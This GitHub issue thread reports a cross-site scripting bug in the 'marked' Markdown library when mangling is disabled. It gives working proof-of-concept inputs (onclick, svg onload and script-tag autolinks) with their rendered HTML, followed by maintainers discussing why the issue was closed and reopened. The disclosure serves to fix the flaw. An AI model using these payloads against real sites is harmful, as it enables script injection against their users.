Cross-site Scripting (XSS) via autolink (require disabled mangling)

[buglloc]

When mangling is disabled via option mangle marked don't escape target href. This allow attacker to inject arbitrary html-event into resulting a tag.

For example, this JS code:

var marked = require('marked');
marked.setOptions({
  renderer: new marked.Renderer(),
  sanitize: true,
  mangle: false
});

text = `
<bar"onclick="alert('XSS')"@foo>
`;

console.log(marked(text));

Will render:

<p><a href="mailto:bar"onclick="alert('XSS')"@foo">bar"onclick="alert('XSS')"@foo</a></p>

Tested on marked v0.3.6
Online demo: http://www.buglloc.com/marked-mangle.html

Fixes #925

[matt-]

Actually you could abuse this to open new tags (and trigger without a click)

text = `
<<svg/onload="alert(1)"//@x>
`;

<p><a href="mailto:<svg/onload="alert(1)"//@x"><svg/onload="alert(1)"//@x</a></p>

or

text = `
<<script/@x>alert(1)//<</script/@x>
`;

<p><a href="mailto:<script/@x"><script/@x</a>alert(1)//<a href="mailto:</script/@x"></script/@x</a></p>

It looks like the "text" var at https://github.com/chjj/marked/blob/master/lib/marked.js#L581 should be escaped.

[joshbruce]

See #937 ??

[matt-]

I was able to reproduce this on master branch. Why was this closed? What tests closed out this issue? @joshbruce

[joshbruce]

Hey @matt- Good questions.

Thought it might be solving the same XSS issue that had already been merged in (from your PR #844). I don't know enough about the library yet (and I'm not an uber-JS person); so, I'm glad you stepped in.

Therefore, while I can help increase flow to publish updates to NPM, document things and establish visions and missions, I'm gonna have to leverage the community a lot to safeguard the codebase. Of course, that's if the community wants to do that. If not, then maybe the mission should be to help folks transition to something else.

Reopening. As a collaborator (I think you're a collaborator); do you have the ability to merge?

See also #956

[matt-]

Nice. I am super excited we have the ability to push. I will look / update some of this tonight. It was hard to be motivated to fix anything knowing it was not going to eve go out.

[joshbruce]

@matt- : Agreed and understandable. So far you are the only collaborator to step back in. @UziTech has also been helping out. Please, keep me posted on what y'all need from a release perspective. I've been doing what I can on the issues. Trying to close a page-worth a week...it's slow going through. Lots of issues.